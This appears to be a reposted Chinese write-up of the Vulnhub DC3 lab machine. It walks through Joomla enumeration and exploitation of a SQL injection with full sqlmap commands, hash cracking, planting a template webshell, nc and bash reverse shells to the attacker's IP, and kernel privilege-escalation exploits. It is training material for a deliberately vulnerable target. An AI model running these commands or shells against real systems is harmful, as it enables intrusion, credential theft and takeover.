【Vulnhub靶机系列】DC3
基本信息
Kali:192.168.61.145?
DC3:192.168.61.163
實驗過程
? ? ? ?同樣先通過arpscan掃描找出DC3的IP地址
?
sudo arp‐scan ‐‐interface eth0 192.168.61.1/24?
?
這里可以直接看出DC3的IP地址為192.168.61.163
然后我們使用nmap對目標進行掃描
發現目標主機只是打開了80端口
?
然后我們查看下80端口,通過wappalyzer,發現用的是Joomla
同時主頁也給我們提示,表明這個靶機只有一個flag
這里我們使用joomscan專用掃描器,來獲取網頁更詳細的信息
joomscan:https://github.com/OWASP/joomscan
perl joomscan.pl ‐u http://192.168.61.163可以看到joomla的詳細版本號和管理后臺
?
我們通過searchsploit查看是否有可以用的EXP
searchsploit joomla 3.7可以看到有一個SQL注入漏洞
searchsploit ‐x php/webapps/42033.txt sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]接下來就是導出admin的賬號密碼,就只放個最后的結果圖,攻擊過程的語句如下:
sqlmap -u "http://192.168.61.163/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomaladb --tablessqlmap -u "http://192.168.61.163/index.php? option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐ level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐‐columnssqlmap ‐u "http://192.168.61.163/index.php? option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27" ‐‐risk=3 ‐‐ level=5 ‐‐random‐agent ‐p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump我們將password的HASH值用john進行破解
解密后的結果為:snoopy
我們嘗試進行登陸,發現是正確的賬號密碼
?
賬號:admin密碼:snoopy進入后臺后,就要想辦法上傳一句話木馬。百度到可以編輯模板來上傳一個webshell
這里編輯Beez3模板
這里我在html目錄下創建了一個名為dfz.php的webshell
然后我們訪問下這個webshell,沒有出現404說明成功上傳
?
http://192.168.61.163/templates/beez3/html/dfz.php?
接下來用蟻劍來鏈接
我們在Kali上使用nc,通過蟻劍反彈一個shell
我們現在Kali上建立監聽
發現DC3上有python環境,嘗試使用python來彈shell,但是Kali上沒有任何反應
然后嘗試使用bash來彈shell,但是也是不行
嘗試使用nc反彈成功
?
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh ‐i 2>&1|nc 192.168.61.145 2222 >/tmp/f
然后使用python改善shell環境
python ‐c "import pty;pty.spawn('/bin/bash')"?
獲取下Linux版本,可以看到是Ubuntu 16.04
我們查找下有沒有可以利用的提權EXP,通過searchsploit有好幾個
這里我們使用下面的EXP嘗試提權
???????
Linux Kernel 4.4.x (Ubuntu 16.04) ‐ 'double‐fdput()' bpf(BPF_PROG_LOAD) PrivilegeEscalation | linux/local/39772.txt我們打開這個EXP的介紹,并到指定網站下載
?
https://github.com/offensive‐security/exploitdb‐bin‐sploits/blob/master/bin‐sploits/39772.zip通過蟻劍上傳到靶機
然后接下來的話就是解壓、編譯、執行EXP來獲得root權限,所有命令如下
unzip 39772.zipcd 39772tar ‐xvf exploit.tar?
- ?
- ?
獲得flag
?
額外補充
利用php反彈shell
?
system("bash ‐c 'bash ‐i >& /dev/tcp/192.168.61.145/2222 0>&1'");
- ?
?
?
?
使用Linux-Exploit-suggestion來輔助提權
下載地址:https://github.com/mzet-/linux-exploit-suggester
上傳到/tmp中,并加權執行
?
chmod +x linux‐exploit‐suggester.sh?
?
這里嘗試下CVE-2016-5195
EXP地址:https://github.com/gbonacini/CVE-2016-5195
下載完成后通過蟻劍上傳,并解壓
然后進入目錄后make下就可以得到dcow文件,執行./dcow -s 嘗試提權
然后靶機就死機了,說明這個EXP不適合
總結
以上是生活随笔為你收集整理的【Vulnhub靶机系列】DC3的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【Vulnhub靶机系列】DC2
- 下一篇: 实战渗透-Shiro反序列化漏洞实例